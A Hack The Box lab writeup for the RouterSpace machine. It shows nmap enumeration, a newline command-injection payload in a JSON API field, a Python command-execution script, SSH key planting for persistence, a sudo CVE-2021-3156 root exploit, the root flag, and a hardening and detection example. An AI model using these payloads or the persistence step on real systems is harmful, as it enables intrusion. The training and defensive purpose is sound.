HTB Writeup: RouterSpace
Tech will overtake the world… Just after solving that captcha real quick.
Enumeration
NMAP Scan
# Nmap 7.92 scan initiated Sun Apr 10 19:53:33 2022 as: nmap -sC -sV -T3 -oN nmap.all-port.txt -vv -p- 10.10.11.148
Nmap scan report for 10.10.11.148 (10.10.11.148)
Host is up, received echo-reply ttl 63 (0.078s latency).
Scanned at 2022-04-10 19:53:39 IST for 138s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDiksdoNGb5HSVU5I64JPbS+qDrMnHaxiFkU+JKFH9VnP69mvgdIM9wTDl/WGjeWV2AJsl7NLQQ4W0goFL/Kz48=
| 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP2psOHQ+E45S1f8MOulwczO6MLHRMr+DYtiyNM0SJw8
80/tcp open http syn-ack ttl 63
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 017FE5BB3BCC0B9C531C0B9402C701FC
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-49027
| Content-Type: text/html; charset=utf-8
| Content-Length: 71
| ETag: W/"47-T64tMSKD7uSVSzvAfvdqZJPKFTg"
| Date: Sun, 10 Apr 2022 14:25:47 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: 90tTo XoP n klD 5 TZ }
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-50696
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Sun, 10 Apr 2022 14:25:46 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-32396
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Sun, 10 Apr 2022 14:25:46 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: RouterSpace
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 10 19:55:57 2022 -- 1 IP address (1 host up) scanned in 143.62 seconds
Important Findings:
- Web Server at TCP/80
- SSH Server at TCP/22
User Access
- Website visited at TCP/80
- An Android app named RouterSpace.apk was provided on the website.
- Static Analysis: a static analysis was performed using MobSF; no interesting data was found.
- Dynamic Analysis
  i. The app was loaded onto an Android emulator (Android API 23) and its traffic was intercepted using Burp Suite.
  ii. An HTTP request to the website routerspace.htb was captured. (To make this work, a manual entry resolving the domain to the HTB IP was appended to /etc/hosts on the Android Virtual Device.)
  iii. Request

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 16
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate

{"ip":"0.0.0.0"}
  iv. Response

HTTP/1.1 200 OK
X-Powered-By: RouterSpace
X-Cdn: RouterSpace-13489
Content-Type: application/json; charset=utf-8
Content-Length: 11
ETag: W/"b-ANdgA/PInoUrpfEatjy5cxfJOCY"
Date: Mon, 11 Apr 2022 00:28:24 GMT
Connection: close

"0.0.0.0\n"
  v. The web server was vulnerable to command execution: a command placed after a newline in the "ip" key of the JSON request was executed on the server (as the user paul, per the id output below).

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 13
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate

{"ip":"\nid"}

HTTP/1.1 200 OK
X-Powered-By: RouterSpace
X-Cdn: RouterSpace-99707
Content-Type: application/json; charset=utf-8
Content-Length: 53
ETag: W/"35-ERWpoCDHm08FgkJsyQjiOS48qOc"
Date: Mon, 11 Apr 2022 09:07:18 GMT
Connection: close

"\nuid=1001(paul) gid=1001(paul) groups=1001(paul)\n"
  vi. A Python script was created to run commands and parse the output:

#!/usr/bin/env python3
import requests
import json
import sys

# The backend checks the User-Agent, so the app's own agent string is sent.
headers = {"Content-Type": "application/json", "User-Agent": "RouterSpaceAgent"}
url = "http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess"


def start_rev_shell(command):
    # A leading newline terminates the server-side command, so the value
    # that follows is executed as a separate command.
    body = {"ip": f"\n{command}"}
    resp = requests.post(url, headers=headers, data=json.dumps(body))
    # The response body is a JSON string containing the command output.
    print(json.loads(resp.text))


if __name__ == "__main__":
    start_rev_shell(sys.argv[1])
  vii. An SSH public key was added to the user's authorized_keys file to get shell access and persistence:

./remote_shell.py "echo -n $(cat ./routerspace-paul.pub) > /home/paul/.ssh/authorized_keys"
ssh -i ./routerspace-paul paul@10.10.11.148
Last login: Mon Apr 11 07:57:18 2022 from 10.10.14.124
paul@routerspace:~$
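The injection in step v works because the value of the "ip" key reaches a shell without validation. As an added example (not code from this writeup or from the box, whose backend is not shown), the following assumes a ping-style check behind the endpoint and contrasts the vulnerable string-building pattern with a hardened handler that accepts only a literal IP address and executes an argv list with no shell; the last function flags the writeup's own payload in request logs.

```python
import ipaddress
import json
import subprocess

# Constructed samples: the two request bodies captured in the writeup.
BENIGN_BODY = '{"ip":"0.0.0.0"}'
INJECTED_BODY = '{"ip":"\\nid"}'  # JSON "\n" escape: a real newline followed by "id"


def vulnerable_command(raw_body: str) -> str:
    """Assumed reconstruction of the flaw (not the box's real code): the untrusted
    'ip' value is interpolated into one command string meant for a shell. The
    newline ends the first command, so 'id' is executed as a second one."""
    ip = json.loads(raw_body)["ip"]
    return f"ping -c 1 {ip}"  # run with shell=True this is two commands


def validated_ip(raw_body: str) -> str:
    """Allow-list validation: only a literal IPv4/IPv6 address is accepted."""
    ip = json.loads(raw_body).get("ip")
    if not isinstance(ip, str):
        raise ValueError("ip must be a string")
    # ipaddress raises ValueError for "\nid", "1.1.1.1; id", hostnames, etc.
    return str(ipaddress.ip_address(ip))


def safe_argv(raw_body: str) -> list:
    """Hardened form: the validated value goes into an argv list that is executed
    without a shell, so nothing in it can be interpreted as shell syntax."""
    return ["ping", "-c", "1", validated_ip(raw_body)]


def run_device_check(raw_body: str) -> str:
    return subprocess.run(safe_argv(raw_body), capture_output=True,
                          text=True, timeout=5).stdout


def is_injection_attempt(raw_body: str) -> bool:
    """Detection helper for request logs or a WAF rule: any body whose 'ip' is
    not a literal address is flagged (JSONDecodeError is a ValueError subclass)."""
    try:
        validated_ip(raw_body)
        return False
    except (ValueError, AttributeError):
        return True


if __name__ == "__main__":
    for body in (BENIGN_BODY, INJECTED_BODY):
        print(repr(body), "->", "injection attempt" if is_injection_attempt(body) else "ok")
```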
Privilege Escalation
- Enumeration was done using linPEAS:

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31

╔══════════╣ CVEs Check
[+] [CVE-2021-3156] sudo Baron Samedit
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
- The remote target is vulnerable to CVE-2021-3156 (sudo "Baron Samedit").
- The exploit available at https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_nss.py was downloaded, uploaded to the target and executed to obtain a shell with uid=0 (root privileges):

➜ mostwanted002@Loki RouterSpace scp -i ./routerspace-paul ./exploit_nss.py paul@10.10.11.148:/tmp/exploit.py
exploit_nss.py
paul@routerspace:~$ python3 /tmp/exploit.py
# id
uid=0(root) gid=0(root) groups=0(root),1001(paul)
# cat /root/root.txt
9b6cae1c5e9ecf5326deb28ef79543ef
#
The remote target is now completely compromised.